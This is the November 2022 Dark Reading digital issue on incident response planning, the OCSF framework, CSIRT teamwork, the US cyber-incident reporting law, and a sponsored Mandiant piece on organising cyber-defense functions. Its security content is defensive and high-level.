NOVEMBER 2022 Sponsored by

Creating an Effective
INSIDE:

Creating an Effective Incident Response

Plan >>

Incident Response Plan New Cross-Industry Group Launches

Open Cybersecurity Framework >>

Applying Behavioral Psychology to

Strengthen Your Incident Response
Security teams are realizing their organizations will experience a Team >>
cyber incident and that they need an effective incident response plan
What the Newly Signed US Cyber-
— one that takes into account their requirements and has been tested. Incident Law Means for Security >>

Mandiant Perspectives: Preparing

for Cyber Defense and Maintaining
Security Control >>

Next
FEATURE

Creating an Effective Incident Response Plan

Security teams are realizing their organizations will experience a cyber incident and that they need an effective incident
response plan — one that takes into account their requirements and has been tested.
By Jeffrey Schwartz, Contributing Writer, Dark Reading

B
usiness leaders and the boards of directors they report to are increasingly accept-
ing the uncomfortable reality that there is little question that their organizations will
fall victim to a cyber incident — but when, and how material will it be?
Dismissing the current risk of an attack puts leaders at risk of breaching their fiducia-
ry responsibilities to their shareholders, customers, and business partners. Naturally,
this requires them to double down on their investments in maintaining comprehensive
cyber-protection strategies. But even those who do are never entirely immune to a po-
tential breach. Consequently, no cybersecurity protection plan can be complete without
an effective incident response plan.

The Rise in Material Breaches

Despite global spending of $77 billion on cybersecurity protection technology and services
in 2022, the number of data breaches — including malware, ransomware, and brute-force
attacks — continues to rise. In 2021, there were 15.1% more incidents than the previous
year, and material breaches soared by nearly 25%, according to a ThoughtLab survey of
1,200 business and technology leaders. The actual figure is likely much higher because
of the number of unreported attacks and breaches.
Ransomware attacks that use more sophisticated social engineering tactics and busi-
ness email compromise (BEC) techniques are contributing to the surge in incidents.

November 2022 2
Previous Next
CREATING AN EFFECTIVE INCIDENT RESPONSE PLAN

Security leaders anticipate such attacks will continue to an attack that they needed one, says LeeAnne Pelzer, plans varied in maturity.
escalate during the next two years. The discovery of new consulting director and leader of Unit 42, Palo Alto Net- “Quite a few have plans, but they are not formalized
and more pervasive vulnerabilities, such as Log4j, con- works’ cybersecurity consulting practice. Pelzer notes or documented,” Corcione explains. He emphasizes that
tributed to the sharp rise in attempted cyberattacks in that, a few years ago, whenever her team was called in these are private companies that aren’t beholden to in-
late 2021. According to a Check Point Research survey, to create an incident response plan, it was always after dustry or SEC regulations. “What really drives the ma-
the number of attempted attacks per week on corporate the client had suffered an attack. Now, she adds, “they’re turity of companies’ incident response plans is going to
networks worldwide increased 50% last year compared starting to allocate time, money, and energy toward get- be the regulations,” he says. “For example, health care is
with 2020. ting in front of an incident before it actually occurs.” very heavily regulated, as well as financial services. You
An external attacker can breach and gain access to Many organizations’ incident response plans are “shelf- won’t see a financial service company that doesn’t have
the network resources of 93% of organizations, ac- ware,” Pelzer says. “They aren’t written in a way that an incident response plan.”
cording to a survey by Positive Technologies. Further,
100% of respondents to the survey acknowledged that
“What really drives the maturity of companies’ incident response plans is
an internal attacker could gain complete control of their
networks. The survey also revealed that nearly a third
going to be the regulations.” —Michael Corcione, Principal of PFK O’Connor Davies
of CISOs and CEOs are unprepared to respond to the
changing threat landscape. [they] can actually be used when you’re going through Coordinating an Effective Response Plan
what could arguably be your worst day at work and your Greg Kelley, founder and CTO of Vestige Digital Investiga-
Growing Focus on Incident Response brain is not firing on all cylinders.” tions, says the first step in creating an incident response
Planning The plans often lack incident categorization and call plan is to define the prominent people in the organization
Many organizations don’t have effective incident response trees with defined roles and responsibilities, experts say. who will respond to an incident. Typically, that includes the
plans. A 2021 Ponemon Institute survey found that only They also don’t always specify procedures for how to ad- CEO, presidents, or other C-level executives, as well as
46% have specific incident response plans for at least one dress ransomware attacks and whether to pay attackers. legal, IT, public relations, and department managers.
of eight cyberattack types: DDoS, malware, phishing, in- Michael Corcione, principal of the PFK O’Connor Da- Experts widely recommend aligning an incident re-
sider incident, BEC, disaster recovery, supply chain attack, vies cybersecurity and privacy advisory service, conduct- sponse plan with the National Institute of Standards and
and advanced persistent threats (APTs). ed 40 different incident response reviews for new clients Technology’s (NIST’s) recommendations published in
The good news is that organizations are becoming more during a three-month period. Corcione says all of the cli- its Computer Security Incident Handling Guide (Special
proactive about creating a plan rather than realizing after ents had an incident response plan in some form, but the Publication 800-61 Revision 2). Among its many recom-

November 2022 3
Previous Next
CREATING AN EFFECTIVE INCIDENT RESPONSE PLAN

mendations, the NIST framework breaks down four steps 4. Post-incident activity: Determine how the organi- something like a granular playbook for different attack
organizations should take to build their plan: zation may have avoided an attack by posing ques- types, or they may be looking for a more generic “drive
1. Preparation: Build and maintain an incident han- tions including: What happened? When? and What the ship” plan.
dler communications plan with contact informa- steps did the response team take that may have im- There are five other base components of an incident
tion, incident reporting mechanisms, an issue peded recovery? response plan:
tracking system, a war room, and encryption soft- 1. Definitions and categorizations, such as what con-
ware for communications. Setting Expectations and Customizing the stitutes an event versus an incident and at what
2. Detection and analysis: Understand attack vectors Response Playbook point is it a crisis?
such as malware in email, malicious websites, im- “NIST and other frameworks definitely set the founda- 2. A severity matrix that prioritizes each incident cat-
personation, removable media, brute force, and un- tion, and they give you the guardrails to stay within,” PFK egory. It should be clear when an incident falls into
usual activity, and use alerting tools including IDPSs, O’Connor Davies’ Corcione says. “But when doing an as- the different severity categories.
SIEMs, antivirus and antispam, and logs. For analy- sessment and review with a company, it’s much better for 3. Roles and responsibilities that specify the core inci-
sis, this should include network system profiling, un- us to have a dialogue with them.” dent response team, including the decision author-
derstanding normal behaviors, creating log retention The first important step is that the sponsor of an inci- ities, senior executives, directors, external counsel,
policies, and performing event correlation. dent response plan must have the full support of lead- forensics, public relations, and insurance providers.
4. Communications plan that includes internal stake-
holders as well as a lawyer-approved template
The first important step is that the sponsor of an incident response plan
specifying an appropriate plan of whom to contact
must have the full support of leadership. first and when.
5. A training, testing, and maintenance schedule that
3. Containment, eradication, and recovery: Identify ership. Without leadership buy-in, the incident response includes simulated tabletop exercises that address
attackers by validating host IP addresses, using in- plan will be destined to fail. Leadership must be on board the different attack vectors.
cident databases, monitoring attackers’ communi- with the overall approach and strategy, and willing to al-
cations channels, and researching through search locate budgets and resources toward the procedures that Testing and Tabletop Exercises
engines. The response team should conduct erad- the incident response plan will include. Developing a plan doesn’t end once everyone has signed
ication and recovery in a phased approach based It’s critical to understand what company leaders want off on it and created playbooks for various scenarios. Ex-
on prioritization. to get out of an incident response plan. They may want perts say organizations should update the plan at least

November 2022 4
Previous Next
CREATING AN EFFECTIVE INCIDENT RESPONSE PLAN

once yearly or after a significant event, including an inci- rights. Effectively, this meant that every employee had Corcione frequently sees the same types of issues.
dent or major infrastructure changes. access to everything on the system, a practice no orga- “There’s definitely a challenge with organizations doing
To ensure that an incident plan will actually work re- nization would intentionally permit. role-based training, specifically for the people in incident
quires testing it under various simulated attacks. To determine what happened, Kelley wanted to see response,” he says. “What you have in the security world
“If the team feels comfortable leveraging these docu- the backups of the Active Directory domain controllers. is a lot of people who have moved up through the infor-
ments, it’s usually a pretty seamless process,” says Unit Kelley recalls: “The top executive said, ‘Sure, we back mation technology space. But the response is a little bit
42’s Pelzer. “However, they might find that depending on up our domain controllers.’ So, he called in the manager different mindset. When you get into incident response,
their unique processes, or their tech stack, that maybe one level down, who then brought in the backup admin- it’s really a big part of what’s going on from a business
the incident response plan is not resonating with them istrator. And the admin said, ‘Oh, that process has been perspective. It’s not just a system that went down; we
as much.” broken for six months, and we don’t know why.’ And the must bring it up. It’s the prioritization around the system.”
While some organizations may find tabletop exercises IT director turned to him and said, ‘So, if Active Directory An incident response plan must prioritize what business
too difficult or cumbersome to run, they play an import- completely crashed, we would have to build [the control- processes are most important, with an understanding of
ant role in defense and incident response. It is essential lers] from scratch?’ And he said, ‘That’s right.’ It was an what systems must be restored first. Corcione empha-
to test all aspects of an incident response plan to verify uncomfortable moment.” sizes that this process must be incorporated into the ta-
that the executed actions generate the expected results. Kelley notes that such failures often happen in orga- bletop exercises and should include representatives from
For instance, many organizations rely on the offline backup nizations because administrators are good at what they across the business.
capabilities with their disaster recovery systems to recover
their data in the event of a ransomware attack. However,
The first important step is that the sponsor of an incident response plan
failing to test that process during a ransomware response
tabletop exercise can have devastating consequences.
must have the full support of leadership.
Vestige Digital Investigations’ Kelley points to an in-
cident where a client asked his firm to determine what do but don’t understand the bigger picture. “He knows “A lot of times, the IT team will go out and do an exer-
caused an attack. The client wanted to determine if it’s important that those servers are backed up, but what cise and then say, ‘OK, technically, we took care of it all,’
someone intentionally created the vulnerability that was he doesn’t know is what reliance the people up the food but they didn’t involve the line of business. Communicat-
exploited, or if it was an oversight. Kelley’s firm found chain are putting on that process to work and how im- ing through those plans and doing role-based training on
that the attacker gained access because the Active Di- portant it is to them that that process works,” he says. those responses is important but is an area where many
rectory domain settings gave every employee admin “It’s the two-way communication that breaks down.” firms lag.”

November 2022 5
Previous Next
CREATING AN EFFECTIVE INCIDENT RESPONSE PLAN

Putting Disclosure Policy into the Plan Corcione. “That intelligence really helps the community, Gary Gensler issued a statement on the proposal in
Response plans should include an intra-organizational and that’s what we’re trying to get at,” he says. March, just after Biden signed the CIRCIA legislation. “A
protocol for informing stakeholders of an incident, but they The unprecedented ransomware attack against Colo- lot of issuers already provide cybersecurity disclosure
also must address disclosure to affected parties, including nial Pipeline in May 2021, which shut down the 5,500- to investors,” according to Gensler’s statement. “I think
customers, partners, and suppliers. Insurance companies mile fuel pipeline for nearly a week, showed the cata- companies and investors alike would benefit if this infor-
often require that their clients contact them before any- strophic implications of an incident. President Biden mation were required in a consistent, comparable, and
one else, though most experts say the first call should be signed into law the Cyber Incident Reporting for Critical decision-useful manner.”
internal and go to legal counsel. The decision-making on Infrastructure Act of 2022 (CIRCIA) in March. The new law
what to disclose and when is increasingly falling under the mandates that providers of infrastructure in 16 industries Concerns About Disclosure Requirements
auspices of industry regulations, as well as state and fed- identified by the federal government report a cyberattack There are conflicting issues regarding required disclosures,
eral laws. to the Cybersecurity and Infrastructure Security Agency especially regarding timing. The concern is that premature
disclosure could weaken a victim’s hand when negotiating
with attackers. Worse, it could antagonize attackers into
The decision-making on what to disclose and when is increasingly falling
taking severely damaging actions. Corcione notes that
under the auspices of industry regulations, as well as state and federal laws. cases can occur when an attacker’s claims are confirmed
as hoaxes after the victim investigates its exfiltration logs.
New York was the first state to formalize regulations (CISA) within 72 hours and within 24 hours of making a Also at issue, according to Corcione, is the type of attack
requiring banks and insurers, among others, to report ransomware payment. that is material enough to warrant disclosure.
cybersecurity incidents. The New York Department of A month after that law was enacted, similar regulations “Materiality is really big,” he says. “The SEC is dealing
Financial Services (NYDFS) regulation was enacted in went into effect for banks. As of April 1, all banks covered with the question of what is that definition of materiality.
2017. “It is, in my view, still the strictest in the world be- by the Federal Deposit Insurance Corp. are required to And then, also, when do the clocks start ticking on the
cause it requires somebody to sign off on an attestation,” notify the agency of a cyber incident within 36 hours of reporting requirement? Is it from when the incident start-
Corcione says. discovering it. ed or from when materiality was determined? These are
Nearly two years after the NYDFS regulation went into Now pending is a proposal by the Securities and Ex- issues that need to be resolved.”
effect, the enforcement team found that 80% of the in- change Commission (SEC) that would mandate disclo-
cidents reported were preventable if the affected firm sures of incidents by all publicly traded companies and Increased Influence of Insurance Carriers
implemented multifactor authentication, according to other companies for which it has oversight. SEC chair Soaring ransomware attacks have led insurance compa-

November 2022 6
Previous Next
CREATING AN EFFECTIVE INCIDENT RESPONSE PLAN

nies to play a central role in incident response planning. and CEO, effective security incident management plans IT security and can communicate it to others. “When I am
Before underwriting or renewing a cyber insurance pol- must include coordination between IT and the business. engaged to investigate and report, it ordinarily is an issue
icy, insurers have stepped up the requirements they’re When IT and top management aren’t on the same page, that could have been resolved without outside counsel,”
placing on their clients. Corcione notes that insurers are it is challenging to implement a proactive incident re- Perry says. “But a lack of clear communications between
now requiring clients to validate their claims. “The insur- sponse plan. IT and the board stymied that understanding.”
ance industry on the cyber side for years has been do-
ing their policy underwriting on a trust aspect,” Corcione
Insurers now require third-party attestation or hire experts to assess a
says. “A client provided self-attestation, and everything
client’s cybersecurity infrastructure and incident response plans.
was in place.”
But as insurers started investigating claims more close-
About the Author: Jeffrey Schwartz is a journalist who has
ly, they discovered that not all their clients’ assessments Braden Perry, a litigation, regulatory, and government
covered information security and all forms of business and
were accurate. “Quite a few cases have come up recent- investigations attorney with law firm Kennyhertz Perry, enterprise IT, including client computing, data center and cloud
ly where insurers are looking not to pay because peo- says it’s vital that the CISO understands business opera- infrastructure, and application development for more than 30
ple have said that they have multifactor authentication intions and processes and can translate technical issues to years. Jeff is a regular contributor to Channel Futures.
their organization, but it turns out there was a breach. the CEO and board.
And while they had multifactor, they didn’t have it across “It’s becoming more critical, and almost imperative, that
the entire organization,” Corcione says. “In these cases, a committee has an experienced IT and cybersecurity li-
the attackers came in through the area where they didn’t aison to be the go-between and translate the IT language
have it.” into business and vice versa,” Perry says.
Insurers now require third-party attestation or hire experts
Unfortunately, most CEOs and board members defer on
to assess a client’s cybersecurity infrastructure and inci-
issues they don’t understand. “When an IT department
dent response plans. “They’re asking not only do you have presents a robust plan for proactive IT security, it may go
an incident response plan, but are you specifically doing ignored or disregarded,” Perry says. “This can lead to a
tabletop exercises for ransomware attacks,” he says. reactive plan only that focuses on the when as opposed
to prevention.”
Coordinating IT and Business Operations Similarly, Perry emphasizes that companies should have
In addition to requiring buy-in from a board of directors at least one board member who is knowledgeable about

November 2022 7
Previous Next
NEWS

New Cross-Industry Group Launches

Open Cybersecurity Framework
Eighteen companies, led by Amazon and Splunk, announced the OCSF framework to provide a standard way for sharing threat
detection telemetry among different monitoring tools and applications.
By Jeffrey Schwartz, Contributing Writer, Dark Reading

A
mazon Web Services (AWS) and Splunk are primarily on detecting and responding to events, securi-
leading an industry effort of 18 systems and ty teams spend time normalizing this data as a prerequi-
security vendors to standardize how different site to understanding and response.”
monitoring systems share security alerts. The goal is OCSF, which extends the ICD Schema specifications
to deliver a simplified and vendor-agnostic taxono- originally developed by Broadcom’s Symantec division,
my to help security teams ingest and analyze security offers a collection of data types, an attribute dictionary,
data faster. and a taxonomy written in JSON, according to an over-
The companies announced the Open Cybersecurity view of the specification available on GitHub. Contribu-
Schema Framework (OCSF) during the Black Hat USA tors can utilize and extend the framework and map the
conference. The participating companies are Broadcom many different data formats. The OCSF specification various data ingestion and normalization schemas in a
(Symantec), Cloudflare, CrowdStrike, DTEX, IBM Secu- will normalize security telemetry across various securi- common threat detection language.
rity, IronNet, JupiterOne, Okta, Palo Alto Networks, Rap- ty products and services, Mark Ryland, director of the “As practitioners, one of the most challenging prob-
id7, Salesforce, Securonix, Sumo Logic, Tanium, Trend office of the CISO at AWS, wrote in a blog post an- lems in technology is connecting finding and event infor-
Micro, and Zscaler. nouncing the project. mation across multiple vendor tools, operating systems,
Detecting and stopping today’s cyberattacks requires “Security teams have to correlate and unify data across and versions,” says Jamie Scott, product manager at En-
coordination across cybersecurity tools, but many of multiple products from different vendors in a range of dor Labs. “A standard data format will reduce cost and
these tools are not interoperable, and there are too proprietary formats,” Ryland wrote. “Instead of focusing accelerate incident triage for our industry as a whole,”

November 2022 8
Previous Next
NEW CROSS-INDUSTRY GROUP LAUNCHES OPEN CYBERSECURITY FRAMEWORK

An Extensible Framework for Interoperability vendors and customers, while MITRE releases all con- is the steering committee composition itself. Since the
As an open source project, OCSF seeks to provide an tent for ATT&CK. committee is made largely of vendors, representative
extensible framework for providing interoperable core An Enterprise Strategy Group and Information Sys- consumer organizations will need a seat at the table to
security schema not tied to a specific provider, Splunk tems Security Association (ISSA) survey found that help drive adoption across vendors,” Scott says. “As the
distinguished engineer Paul Agbabian wrote in a white 77% of cybersecurity professionals want to see the OCSF continues to collaborate with the industry, it should
paper documenting OCSF. Licensed under the Apache industry forge support for open standards. The same ensure that the steering committee has reserved spots
License 2.0, OCSF features an agnostic storage for- survey found that 85% see integration among products for industry practitioners who are willing to make an in-
mat, data collection, and extract, transform, and load as essential. vestment in their mission.”
(ETL) processes. The schema browser represents cate- “Cybersecurity is ready to move on from silos and into Erkang Zheng, founder and CEO of cyber operations
gories, event classes, dictionaries, data types, profiles, an open, integrated era of interoperability and coopera- platform provider JupiterOne, is pledging to embrace and
and extensions. tion,” Agbabian noted. participate in extending OCSF.
“Vendors and other data producers can adopt and ex- “Over time, we will continue to contribute to the OCSF
tend the schema for their specific domains,” Agbabian Normalizing Security Telemetry initiative by extending the framework to cover both
explained in a separate blog post. “Data engineers can The project is open to other providers wishing to partici- time-series event data and stateful/structural asset data,
map existing schemas to help security teams simplify pate and contribute, according to Ryland. leveraging JupiterOne’s open-source data model,” Zheng
data ingestion and normalization so that data scientists “We see value in contributing our engineering efforts wrote. “Our hope in participating in this initiative is to in-
and analysts can work with a common language for and also projects, tools, training, and guidelines to help spire more cross-industry collaboration.”
threat detection and investigation.” standardize security telemetry across the industry,” he Scott adds: “Solving a problem like this is a journey that
“Having a common data format for these events to be wrote. “Although we as an industry can’t directly control will require learnings across the industry. But the destina-
shared across tooling will make both consumers’ and the behavior of threat actors, we can improve our collec- tion makes the journey worth it.”
producers’ lives easier. Producers can more easily inte- tive defenses by making it easier for security teams to do
grate with other solutions and consumers can aggregate their jobs more efficiently.” About the Author: Jeffrey Schwartz is a journalist who has
covered information security and all forms of business and
and triage incidents,” Scott says. The status of the OCSF and when vendors will begin
enterprise IT including client computing, data center and cloud
The OCSF shares some similar taxonomy with the testing wasn’t immediately apparent. And it remains to be infrastructure, and application development for more than 30
widely used MITRE ATT&CK Framework, according to seen to what extent the vendors will ultimately contribute years. Jeff is a regular contributor to Channel Futures.
the white paper, though it also noted some stark differ- to OCSF and implement it.
ences. The most notable is that OCSF is extensible by “The biggest threat to an early-stage effort like OCSF

November 2022 9
Previous Next
ANALYSIS

Applying Behavioral Psychology to Strengthen

Your Incident Response Team
A deep-dive study on the inner workings of incident response teams leads to a framework to apply
behavioral psychology principles to CSIRTs.
By Kelly Sheridan, Contributing Writer, Dark Reading

C
ybersecurity incident response teams (CSIRTs) rely “Across our team of researchers and practitioners, we
on technical and social skills. But focusing mostly put in over 56,000 hours of analysis and interviewing,
on technical knowledge can come at the expense to data gathering and analysis, to understand … not
of communication and teamwork, according to a study. only what an individual on the team does but the team
This idea was the focus of a five-year study analyzing in- they represent, or the multiteam system they represent,”
cident response teams from a social-behavioral perspec- Shore says.
tive. From 2012 to 2017, a team of researchers funded Bionic CEO Mark Orlando discovered this research as
by the US Department of Homeland Security interviewed part of his own work looking into how security teams can
more than 200 people and led 80 focus groups across 17 better work together. “It really resonated with me,” he
international organizations to identify the key drivers of says. “I thought the research was great; there were a lot
teamwork within and between teams. of very practical things in there that I was able to use in
The researchers included several people from George my work.” He began to reference the research and as a
Mason University (GMU) who teamed up with Dartmouth result, he was later connected to Shore.
and HP, and received funding from the Swedish and “What was identified early on that spurred that research
Dutch governments, says Dr. Daniel Shore, chief research …was the idea that in cybersecurity, there are lots of an-
officer at Leadership & Effective Teamwork Strategies alysts and front-line eyes-on-glass people who are very
(LETS), who worked on the study while he was at GMU. egocentric — not to say they’re egotistical, but egocen-

November 2022 10
Previous Next
APPLYING BEHAVIORAL PSYCHOLOGY TO STRENGTHEN YOUR INCIDENT RESPONSE TEAM

tric,” Shore explains. “They see things from their own per- CSIRTs face in operating within the context of a multi- you structure this goal hierarchy, it’s all stemming from
spective; they’re used to being able to say, ‘I can handle group, multiteam system as they need to do. the individual perspective. So what is the individual’s op-
this challenge on my own.’” portunity to give input to their own goals, to the team’s
It makes sense, he continues. Many security pros are A Framework to Tackle the Problem goals, to the organization’s goals?”
trained individually; they learn how to hack, investigate, In a Black Hat Europe briefing, “Building Better CSIRTs Us- An individual can be given chances to understand this
and test on their own. Then they’re dropped into situ- ing Behavioral Psychology,” Orlando and Shore discussed through all-hand meetings, cross-training, and shadow-
ations in which they face complex problems and chal- these challenges in depth and provided a framework for ing other people’s work. At the organizational level, con-
lenges that require collaboration, but they don’t have the applying behavioral psychology principles to improve sider where there are opportunities for a person to be in-
background and habits that come with working collabo- CSIRTs’ social maturity, as well as tools to improve the volved and feel invested in the organization’s goals.
ratively in a multiteam system. skills defenders need to more effectively work together. “What happens is we end up in crisis after crisis,” Shore
Orlando says it’s natural for relationships to form, and “You can be a little bit more deliberate, and a little bit says, “and if we’re reactively trying to involve people in
for trust to form, in an incident response team and within more focused, about how those relationships form and setting goals and validating those goals, it doesn’t play
a larger organization. In his experience, he often encoun- about how knowledge is shared,” says Orlando, noting into the strength of what could be done proactively.”
ters what he calls the “rock star problem.” the importance of how CSIRTs work together with other
“You’ve got one or a few people [who are] very, very ca- teams across the business. Having an effective incident About the Author: Kelly Sheridan is the former senior staff
editor at Dark Reading.
pable, very knowledgeable, and the team sort of coalesc- response team doesn’t necessarily mean you’ll be suc-
es around those individuals,” he says. “Which is not nec- cessful as a security organization, he adds.
essarily a bad thing, but it can create issues when those “You have to work as part of a larger ecosystem; securi-
individuals inevitably move on, or maybe they [have] less ty doesn’t just happen in a vacuum,” Orlando says.
than optimal work habits, or behaviors, or things we want One of these tools, for example, is called a goal hier-
to try to account for.” archy. Everybody has their own goals, team goals, and
Compounding CSIRTs’ collaboration issues is a prom- organizational goals, says Shore. Most people have al-
inent focus on technical tools and skills, Orlando adds. ready thought about this concept, but the idea here is to
Incident response teams are “often inundated” with tools expand on the way businesses think about these goals
to address technical problems in security and incident from an individual’s perspective.
response; however, there is a “definite lack” of tools to “The team goals don’t matter to the individual if the in-
address some of the social and collaboration challenges dividual’s not part of the team goals,” he explains. “When

November 2022 11
Previous Next
NEWS

What the Newly Signed US Cyber-Incident Law

Means for Security
Bipartisan cybersecurity legislation comes amid increased worries over ransomware, and fears of cyberattacks from Russia in the
wake of its invasion of Ukraine.
By Steve Zurier, Contributing Writer, Dark Reading

W
hen President Biden signed the omnibus Game Changer
spending bill in March, he also put the bipar- “It’s a game changer,” says Tom Kellermann, head of cy-
tisan Cyber Incident Reporting Act into ef- bersecurity strategy at VMware. “It’s a fundamentally im-
fect, which requires critical infrastructure companies in portant strategic decision made by the federal government
the 16 industry sectors identified by the federal govern- to finally eliminate the plausible deniability that had existed
ment to report to the Cybersecurity and Infrastructure for far too long. ...Corporations have [for some time] un-
Security Agency (CISA) within 72 hours if they are expe- derinvested in cybersecurity because they could always
riencing a cyberattack and within 24 hours of making a maintain plausible deniability.”
ransomware payment. Kellermann argues that the new law will force compa-
While this wasn’t the all-encompassing data breach law nies to hire a CISO, give that person a budget, and pro-
that has been stalled in Congress for many years, it was vide detection response oversight.
notable in that the Senate passed the legislation unan- “Companies need to show that they are taking this se-
imously. The bill was championed by Sen. Gary Peters riously,” Kellermann says. “They will either have to hire a
(D-Mich.) and Sen. Rob Portman (D-Ohio); it covers a CISO, or if they already have one, promote the CISO and
broad swath of the economy, including the defense in- make sure they have veto authority over the CIO. The
dustrial base sector, which has more than 100,000 com- general counsel will also have to become more famil-
panies alone. iar with privacy and cyber laws. They will need to work

November 2022 12
Previous Next
WHAT THE NEWLY SIGNED US CYBER-INCIDENT LAW MEANS FOR SECURITY

hand-in-hand with the CISO in their information-sharing agencies like the DoJ and FBI and provide a standardized over time prove the correlation between the ransom pay-
efforts in public-private partnerships with the ISACs and method in which to deal with these attacks, prosecute ments and the bad threat actors.
working with CISA.” these perspective cyber hackers, and ensure that each “I would like to see a banning of ransomware payments
The new law gives CISA the authority to subpoena reporting entity has a well-defined cybersecurity strategy and explicit regulation as it relates to the exchanges,”
companies that fail to report cybersecurity incidents or that integrates security and operations across their re- Kellermann says. “But I’ve been in cybersecurity for 23
ransomware payments. Organizations that fail to com- spective networks.” years. To have true bipartisanship action in this regard
ply with the subpoena can be referred to the Depart- Davis McCarthy, principal security researcher at Valtix, is historic.”
ment of Justice. adds that the new incident reporting law stands as a pro-
The provision requires CISA to launch a program that active, collaborative approach by the federal government About the Author: Steve Zurier has more than 30 years of
journalism and publishing experience and has covered networking,
will warn organizations of vulnerabilities that ransomwareto combat the booming cybercrime industry. McCarthy
security, and IT as a writer and editor since 1992.
actors exploit, and directs CISA Director Jen Easterly to says data has become a valuable commodity in both tra-
establish a joint ransomware task force to coordinate fed-ditional and criminal markets.
eral efforts — in tandem with industry — to prevent and “They say that ‘knowing is half the battle,’ and this law
disrupt ransomware attacks. The omnibus law also au- will improve our collective understanding of who stole
thorizes $2.59 billion in funding to CISA, which was $300 the data, what data they want next, and what they stand
million above the Biden administration’s proposal. to gain by possessing it,” McCarthy says. “However,
“This is very significant legislation as it addresses the
the law uses policy to make a valuable security process
increasing cybersecurity threats amid rising concerns available to the public and critical infrastructure orga-
that Russia’s invasion of Ukraine could lead to Krem- nizations. The law does not enforce the output value:
lin-backed hackers attacking critical infrastructure such No one has to patch a critical vulnerability, harden their
as hospitals, power plants, and fuel pipelines,” notes cloud infrastructure, or threat hunt for recent ransom-
Chris Cruz, SLED CIO at Tanium. ware [indicators of compromise].”
VMware’s Kellermann would have liked to have seen
Centralized Repository lawmakers get tougher on the ransomware payments
CISA will have a centralized repository of information on and the cryptocurrency operators who manage the ran-
threat-actor plans, programs, and operations, he notes. som payments, many of whom have ties to North Korea
“This will allow information sharing among the critical and Russia. He says federal officials will collect data and

November 2022 13
Previous Next
SPONSORED CONTENT

MANDIANT PERSPECTIVES

Preparing for Cyber Defense and Maintaining

Security Control
Defense capabilities are often siloed, but a unified approach is key to success.
By Jim Meyer, Technical Director; Dan Nutting, Consulting Manager; Jennifer Guzzetta, Senior Product Marketing Manager — Mandiant

I
n today’s evolving threat landscape, effective cyber specialty. Key duties of this critical function include review
defense is a necessity. However, in most organizations, of tactical inputs such as escalated incidents, detection of
defense capabilities are functionally fractured into silos adversary behaviors, and identification of missed indica-
of expertise and frustratingly disconnected from key ob- tors of compromise from its neighboring five functions —
jectives and the overall mission. A successful cyber-de- to then organize, measure, and share orderly information
fense center requires taking a unified approach, spear- across the holistic cyber-defense center.
headed by a dedicated function. For example, when a new threat has been identified (in-
As stated in The Defender’s Advantage, cyber defense is telligence), the details are used to build new alerts (de-
one of four closely integrated information security domains, tection), escalated incidents are triaged and investigated
alongside security governance, security architecture, and (response), the presence of adversaries hiding in the net-
security risk management. Cyber defense is comprised of work is found (hunt), and new attack patterns are simulat-
six critical functions that enable organizations to operate ed (validation). Although the threat was identified by the
in the face of threats. A complete cyber-defense center intelligence function, it does not serve as the nucleus of
includes threat intelligence, threat hunting, detection, re- unified approach to ensure that each area of expertise can all activity. Instead, the command-and-control function is
sponse, validation, and command-and-control. support one another with clear visibility into the knowl- the hub for tracking the success of each action and bro-
The command-and-control function is the nucleus to the edge, experience, tools, and processes provided by each kering the exchange of information that drives resolution.

November 2022 14
Previous Next
PREPARING FOR CYBER DEFENSE AND MAINTAINING SECURITY CONTROL

Sample Log4j Use Case of Six Cyber Defense Functions Working Together

Intelligence
IDENTIFY threat actors exploiting
CVE-2021-44228
INFORM on infrastructure
INFORM on subsequent TTPs

Validation Hunt
SCAN for vulnernable assets ANALYZE DNS queries from
PATCH CVE-2021-44228 vulnerable assets, look for
potential environment variable
TEST detections
GENERATE artifacts for
Hunt/Response practice

Command-and-Control
COORDINATE:
Provide vulnerable inventor to Hunt
Initiate Validation after alerts are deployed
Activate Response if Hunt finds suspicious
DNS queries
Communicate with leadership

Detection Response
ALERT to suspicious JNDI strings RESTRICT egress capabilities
UPDATE IDS/WAF rules PLAN containment around
Log4j applications

November 2022 15
Previous Next
PREPARING FOR CYBER DEFENSE AND MAINTAINING SECURITY CONTROL

The command-and-control function acts as the central • S hare details with the intelligence function, requesting ment of interoperation prevents the functional silos from
hub of awareness, facilitating and tracking communica- analysis to determine the potential type of threat and forming. Without this core function, Mandiant has wit-
tions between groups handling intelligence, detection, motivation behind it. nessed immature security teams exacerbate the delay,
response, hunt, and validation. Command-and-control • Disclose threat context with the detect function to and at times cause the demise of their security readiness.
defines and sustains the governance, collaboration, deploy new alerts to scope the attacker’s presence For example, Mandiant has observed teams forbid the
and communications for specificized expertise that are and alarm attempted reentry. socialization of incident reports, hide penetration test re-
potentially insourced or outsourced given the organi- • Assign incident prioritization to the hunt function sults from the rest of the cyber-defense center, and ob-
zation’s composition. Specialized functions often fo- to gather scheduled task configurations and begin scurely publish findings that never become championed
cus almost entirely on their area of expertise, requiring analysis of similar server activities. and in turn sit dormant without action.
command-and-control to provide interconnection and • Direct the validation function to test the scheduled The continuous command-and-control efforts of as-
collaboration. task in a sandbox. sessing, tracking, and measuring cyber incidents and
Let’s explore a ransomware-related sample use case • Uncover all findings with the response function to guiding actionable improvements helps mature the ho-
in which an administrator account was abused by a request initiation of rapid remediation. listic expertise of the cyber-defense center’s productivity.
threat actor who updated a group policy object (GPO) After an incident is resolved, command-and-control Ultimately, command-and-control ensures the necessary
to create a scheduled task on all servers for execution, publishes metrics that showcase the effectiveness of the governance, processes, and communications are adapt-
beginning on Friday and concluding on Sunday. The cyber-defense center’s operational workflow. Since many ed by all critical functions and structured accordingly to
adversary selected this specific tactic to easily distrib- aspects of the process are cyclical, they are measured at guide effective operations for combating sophisticated
ute malware across the entire victim environment. On smaller units of the cycles. For example, the time-to-inci- cyber adversaries.
the first day of deployment, the security operations dent-creation holds many steps, including the time from
center (SOC) received and escalated endpoint alerts log event generation to SIEM alert, SOAR enrichment, About the Company: Since 2004, Mandiant provides
unparalleled threat intelligence and incident response to help
that identified the scheduled task pointing to an un- and analyst triage and escalation. The measurement of
organizations tackle their top security challenges. Learn how we
signed PowerShell script. Based on this incident, the each smaller unit demonstrates where time was lost. In- can assess and improve your cyber defense. Get a copy of the
command-and-control function would assume respon- ept transitions from specialized, functional silos wastes award-winning book The Defender’s Advantage. Mandiant is now
sibility to ensure all cyber-defense center functional re- significant time, combated by command-and-control’s part of Google Cloud.
sources are orchestrated properly and collaborating ef- management.
fectively by enforcing a RACI model to align functional Outside of incidents, command-and-control monitors
capabilities and responsibilities: and measures cyber-defense operations. This enforce-

November 2022 16
Previous